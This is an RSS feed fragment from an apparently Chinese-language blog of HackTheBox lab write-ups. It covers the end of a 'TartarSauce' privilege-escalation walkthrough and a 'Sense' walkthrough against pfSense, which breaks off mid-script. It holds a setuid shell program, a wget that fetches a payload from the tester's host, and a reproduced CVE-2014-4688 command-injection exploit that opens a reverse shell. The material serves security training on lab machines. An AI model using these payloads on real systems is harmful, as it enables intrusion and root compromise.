&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">execl&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;/bin/sh&amp;#34;&lt;/span>, &lt;span class="s2">&amp;#34;sh&amp;#34;&lt;/span>, 0&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#编译&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">gcc -m32 exp.c -o exp
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#添加suid位权限(第一位)，setuid: 设置使文件在执行阶段具有文件所有者的权限&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">7777&lt;/span> exp
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#构造web目录&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">mkdir -p var/www/html
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">cp exp /var/www/html
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#打包&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">tar -zcvf exp.tar.gz var
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>当&lt;code>pspy32&lt;/code>监听到&lt;code>/usr/sbin/backuperer&lt;/code>执行的时候，在30秒内快速删除掉&lt;code>/var/tmp/.2aecc95...&lt;/code>的隐藏文件，并把打包好的&lt;code>exp.tar.gz&lt;/code>下载并重命名到&lt;code>/var/tmp/.2aecc95...&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">wget 10.10.16.3/exp.tar.gz -O /var/tmp/.2aecc95...
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>等待一会root会把压缩包解压到&lt;code>/var/tmp/check/&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_6mH0WycVZy_hu9efe8ad6179681306209ffe9e134f247_37802_c31525a01a296f02555fd6d421920350.webp 400w,
/post/hackbox/tartarsauce/image/image_6mH0WycVZy_hu9efe8ad6179681306209ffe9e134f247_37802_4826e3f8f3e4d1050e58756abbff473a.webp 760w,
/post/hackbox/tartarsauce/image/image_6mH0WycVZy_hu9efe8ad6179681306209ffe9e134f247_37802_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_6mH0WycVZy_hu9efe8ad6179681306209ffe9e134f247_37802_c31525a01a296f02555fd6d421920350.webp"
width="832"
height="128"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/tartarsauce/image/image_99-4esBi7g_hu35c09fce75c509f62da6be20ba03e19e_33196_9af7f9824993ebb943b3e1a8181d5f43.webp 400w,
/post/hackbox/tartarsauce/image/image_99-4esBi7g_hu35c09fce75c509f62da6be20ba03e19e_33196_a8c7db4499958d9772d3c567badb264a.webp 760w,
/post/hackbox/tartarsauce/image/image_99-4esBi7g_hu35c09fce75c509f62da6be20ba03e19e_33196_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/tartarsauce/image/image_99-4esBi7g_hu35c09fce75c509f62da6be20ba03e19e_33196_9af7f9824993ebb943b3e1a8181d5f43.webp"
width="1050"
height="110"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Sense</title><link>https://docs.kaiasec.tk/post/hackbox/sense/</link><pubDate>Wed, 13 Jul 2022 09:43:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/sense/</guid><description>&lt;h3 id="nmap扫描">nmap扫描&lt;/h3>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.60
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>发现80，443&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_qZBfUmK1Fl_hu1b668b07f9547e16b41dfbad0f439c56_164433_d05b63bc0f8a488a853c016582f1a97d.webp 400w,
/post/hackbox/sense/image/image_qZBfUmK1Fl_hu1b668b07f9547e16b41dfbad0f439c56_164433_bf77b0c74d756d3c3c81aa292ff4e6ae.webp 760w,
/post/hackbox/sense/image/image_qZBfUmK1Fl_hu1b668b07f9547e16b41dfbad0f439c56_164433_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_qZBfUmK1Fl_hu1b668b07f9547e16b41dfbad0f439c56_164433_d05b63bc0f8a488a853c016582f1a97d.webp"
width="810"
height="382"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="pfsense是个开源的防火墙和路由器功能的设备">pfsense是个开源的防火墙和路由器功能的设备&lt;/h3>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_6vAitsrrQN_hubc58d4f99325fa3e59d63791672350e4_112132_61124ee34b1c97a616020e5e42b801df.webp 400w,
/post/hackbox/sense/image/image_6vAitsrrQN_hubc58d4f99325fa3e59d63791672350e4_112132_c33c93d17ec84481b04c502492848bfa.webp 760w,
/post/hackbox/sense/image/image_6vAitsrrQN_hubc58d4f99325fa3e59d63791672350e4_112132_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_6vAitsrrQN_hubc58d4f99325fa3e59d63791672350e4_112132_61124ee34b1c97a616020e5e42b801df.webp"
width="837"
height="563"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>简单尝试了下 &lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">admin/admin,root/root,test/test,user/user,pfsense/pfsense,admin/pfsense
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>没登录成功，&lt;/p>
&lt;p>看了下服务response返回 &lt;code>Server: lighttpd/1.4.35&lt;/code>&lt;/p>
&lt;p>搜了下发现&lt;/p>
&lt;p>&lt;a href="https://www.cvedetails.com/cve-details.php?t=1%5c&amp;amp;cve_id=CVE-2014-2323" title="https://www.cvedetails.com/cve-details.php?t=1\&amp;amp;cve_id=CVE-2014-2323" target="_blank" rel="noopener">https://www.cvedetails.com/cve-details.php?t=1&amp;amp;cve_id=CVE-2014-2323&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_O1fxZkmbpl_huce0ff554cf1559e71cfcf06ad00f797c_93811_63af327b14b054a4b95475593bacdf86.webp 400w,
/post/hackbox/sense/image/image_O1fxZkmbpl_huce0ff554cf1559e71cfcf06ad00f797c_93811_19a6978a70859669cfe77a5e47c28f99.webp 760w,
/post/hackbox/sense/image/image_O1fxZkmbpl_huce0ff554cf1559e71cfcf06ad00f797c_93811_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_O1fxZkmbpl_huce0ff554cf1559e71cfcf06ad00f797c_93811_63af327b14b054a4b95475593bacdf86.webp"
width="1102"
height="684"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>经过验证发现不包括 &lt;code>lighttpd/1.4.35&lt;/code> 版本&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image__mZYyzzeqa_hu255d4938a819e423de9dec14994a78cc_92399_7fcb38eee1e450360932f3e96cff727c.webp 400w,
/post/hackbox/sense/image/image__mZYyzzeqa_hu255d4938a819e423de9dec14994a78cc_92399_cda55e6cb7a2acbec7026e1ae6dd0b48.webp 760w,
/post/hackbox/sense/image/image__mZYyzzeqa_hu255d4938a819e423de9dec14994a78cc_92399_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image__mZYyzzeqa_hu255d4938a819e423de9dec14994a78cc_92399_7fcb38eee1e450360932f3e96cff727c.webp"
width="983"
height="638"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>用dirbuster扫描一下web路径&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_5PU7nDQd_G_huc7e83ddcdcb41455bcc1a7237ca4939f_61174_6ec746cf0b7f5fd0f7f8984047d91ae3.webp 400w,
/post/hackbox/sense/image/image_5PU7nDQd_G_huc7e83ddcdcb41455bcc1a7237ca4939f_61174_bc269c6dbec9fd227aceb71c370c77de.webp 760w,
/post/hackbox/sense/image/image_5PU7nDQd_G_huc7e83ddcdcb41455bcc1a7237ca4939f_61174_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_5PU7nDQd_G_huc7e83ddcdcb41455bcc1a7237ca4939f_61174_6ec746cf0b7f5fd0f7f8984047d91ae3.webp"
width="931"
height="625"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>扫到一个安全日志信息，说有一个漏洞没修。&lt;/p>
&lt;p>&lt;a href="https://10.10.10.60/changelog.txt" title="https://10.10.10.60/changelog.txt" target="_blank" rel="noopener">https://10.10.10.60/changelog.txt&lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_1lF-LJuKvZ_hu17ffbbe62cde5773da8d7e811aabc521_42296_7253286a96250a80acb380f9021c5466.webp 400w,
/post/hackbox/sense/image/image_1lF-LJuKvZ_hu17ffbbe62cde5773da8d7e811aabc521_42296_3d628b7184b072e0fa9a157c8f7e9ee8.webp 760w,
/post/hackbox/sense/image/image_1lF-LJuKvZ_hu17ffbbe62cde5773da8d7e811aabc521_42296_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_1lF-LJuKvZ_hu17ffbbe62cde5773da8d7e811aabc521_42296_7253286a96250a80acb380f9021c5466.webp"
width="745"
height="251"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="继续扫描发现-system-userstxthttps10101060system-userstxt-system-userstxt">继续扫描发现 &lt;a href="https://10.10.10.60/system-users.txt" title="system-users.txt" target="_blank" rel="noopener">system-users.txt&lt;/a>&lt;/h3>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_3vWFn4RX5m_hu246c5999be104384da6d9af94d7e9d8c_27413_35ae48f8b04f19e08fb760bf2482550d.webp 400w,
/post/hackbox/sense/image/image_3vWFn4RX5m_hu246c5999be104384da6d9af94d7e9d8c_27413_59e8760534fc3fce40925866979db34d.webp 760w,
/post/hackbox/sense/image/image_3vWFn4RX5m_hu246c5999be104384da6d9af94d7e9d8c_27413_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_3vWFn4RX5m_hu246c5999be104384da6d9af94d7e9d8c_27413_35ae48f8b04f19e08fb760bf2482550d.webp"
width="565"
height="251"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>尝试登录 &lt;code>Rohit/pfsense&lt;/code> 还是登不上&lt;/p>
&lt;p>最后发现用户密码是 &lt;code>rohit/pfsense&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_S3QtoF_6KF_hucf62498ed56f6e56a1aa20924d874a77_133651_4295c51158dc14445fcc7312ce5b4079.webp 400w,
/post/hackbox/sense/image/image_S3QtoF_6KF_hucf62498ed56f6e56a1aa20924d874a77_133651_6b6ed38a3bde36f187b7c64f626d8386.webp 760w,
/post/hackbox/sense/image/image_S3QtoF_6KF_hucf62498ed56f6e56a1aa20924d874a77_133651_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_S3QtoF_6KF_hucf62498ed56f6e56a1aa20924d874a77_133651_4295c51158dc14445fcc7312ce5b4079.webp"
width="931"
height="582"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这里看到pfsense的版本是&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">2.1.3-RELEASE &lt;span class="o">(&lt;/span>amd64&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">built on Thu May &lt;span class="m">01&lt;/span> 15:52:13 EDT &lt;span class="m">2014&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">FreeBSD 8.3-RELEASE-p16
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>搜了下相关版本的漏洞&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_DpiVUZwouh_hu0dc37633d670f29920fec58e2b06f3ee_108855_3af5c19fe4bdc7e0accf61128cf19864.webp 400w,
/post/hackbox/sense/image/image_DpiVUZwouh_hu0dc37633d670f29920fec58e2b06f3ee_108855_f20d440f05c1f9e13f2b6fbe25b2e8cb.webp 760w,
/post/hackbox/sense/image/image_DpiVUZwouh_hu0dc37633d670f29920fec58e2b06f3ee_108855_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_DpiVUZwouh_hu0dc37633d670f29920fec58e2b06f3ee_108855_3af5c19fe4bdc7e0accf61128cf19864.webp"
width="863"
height="877"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="漏洞利用">漏洞利用&lt;/h3>
&lt;p>&lt;a href="https://www.exploit-db.com/exploits/43560" title="https://www.exploit-db.com/exploits/43560" target="_blank" rel="noopener">&lt;strong>https://www.exploit-db.com/exploits/43560&lt;/strong>&lt;/a>&lt;/p>
&lt;p>CVE-2014-4688&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_jFK3Qoq712_hu430db6facb7b935da7d5b45e3594ff36_188507_645f5a31b96d3d34e21ea4585489a57e.webp 400w,
/post/hackbox/sense/image/image_jFK3Qoq712_hu430db6facb7b935da7d5b45e3594ff36_188507_ea3284107222efcc3298760964eda478.webp 760w,
/post/hackbox/sense/image/image_jFK3Qoq712_hu430db6facb7b935da7d5b45e3594ff36_188507_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_jFK3Qoq712_hu430db6facb7b935da7d5b45e3594ff36_188507_645f5a31b96d3d34e21ea4585489a57e.webp"
width="1495"
height="851"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>执行脚本&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python3 CVE-2014-4688.py --rhost 10.10.10.60 --lhost 10.10.14.9 --lport &lt;span class="m">23333&lt;/span> --username rohit --password pfsense
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="line">&lt;span class="cl">&lt;span class="ch">#!/usr/bin/env python3&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Exploit Title: pfSense &amp;lt;= 2.1.3 status_rrd_graph_img.php Command Injection.&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Date:2018-01-12&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Exploit Author: absolomb&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Vendor Homepage: https://www.pfsense.org/&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Version: &amp;lt;=2.1.3&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Tested on: FreeBSD 8.3-RELEASE-p16&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># CVE : CVE-2014-4688&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">argparse&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">requests&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">urllib&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">urllib3&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">collections&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s1">pfSense &amp;lt;= 2.1.3 status_rrd_graph_img.php Command Injection.
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s1">This script will return a reverse shell on specified listener address and port.
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s1">Ensure you have started a listener to catch the shell before running!
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s1">&amp;#39;&amp;#39;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">parser&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">argparse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ArgumentParser&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">parser&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add_argument&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;--rhost&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">help&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Remote Host&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">parser&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add_argument&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;--lhost&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">help&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;Local Host listener&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">parser&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add_argument&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;--lport&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">help&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;Local Port listener&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">parser&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add_argument&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;--username&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">help&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;pfsense Username&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">parser&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">add_argument&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;--password&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">help&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;pfsense Password&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">args&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">parser&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">parse_args&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">rhost&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">rhost&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">lhost&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">lhost&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">lport&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">lport&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">username&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">username&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">password&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">password&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># command to be converted into octal&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">command&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;&amp;#34;&amp;#34;
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">python -c &amp;#39;import socket,subprocess,os;
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">s.connect((&amp;#34;&lt;/span>&lt;span class="si">%s&lt;/span>&lt;span class="s2">&amp;#34;,&lt;/span>&lt;span class="si">%s&lt;/span>&lt;span class="s2">));
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">os.dup2(s.fileno(),0);
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">os.dup2(s.fileno(),1);
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">os.dup2(s.fileno(),2);
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">p=subprocess.call([&amp;#34;/bin/sh&amp;#34;,&amp;#34;-i&amp;#34;]);&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">&amp;#34;&amp;#34;&amp;#34;&lt;/span> &lt;span class="o">%&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="n">lhost&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">lport&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">payload&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># encode payload in octal&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">for&lt;/span> &lt;span class="n">char&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">command&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">payload&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\\&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="nb">oct&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">ord&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">char&lt;/span>&lt;span class="p">))&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">lstrip&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;0o&amp;#34;&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">login_url&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;https://&amp;#39;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">rhost&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s1">&amp;#39;/index.php&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">exploit_url&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;https://&amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">rhost&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34;/status_rrd_graph_img.php?database=queues;&amp;#34;&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="s2">&amp;#34;printf+&amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34;&amp;#39;&amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">payload&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34;&amp;#39;|sh&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">headers&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">[&lt;/span>
